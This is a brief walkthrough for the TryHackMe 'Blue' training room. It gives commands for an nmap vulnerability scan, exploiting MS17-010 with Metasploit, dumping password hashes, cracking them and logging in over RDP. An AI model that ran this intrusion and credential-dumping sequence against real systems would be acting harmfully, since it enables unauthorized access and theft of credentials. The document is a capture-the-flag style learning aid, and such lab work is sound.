This document outlines the steps to successfully complete the TryHackMe Blue room.
- Vulnerability Scan: Identify potential vulnerabilities on the target machine.
- Use Exploit: Leverage an exploit to gain initial access.
- Get Password Hash: Extract password hashes from the compromised system.
- Get Password: Crack the obtained password hashes.
- Login: Use the cracked credentials to log in to the target machine.
- Vulnerability Scan
nmap --script vuln -T5 TARGET_IP
- Use Exploit
msfconsole search ms17 use 0 options set rhost TARGET_IP run - Get Password Hash
hashdump
- Get Password
# Use a service like hashes.com - Login
xfreerdp /u:username /p:"password" /v:AttackBoxIP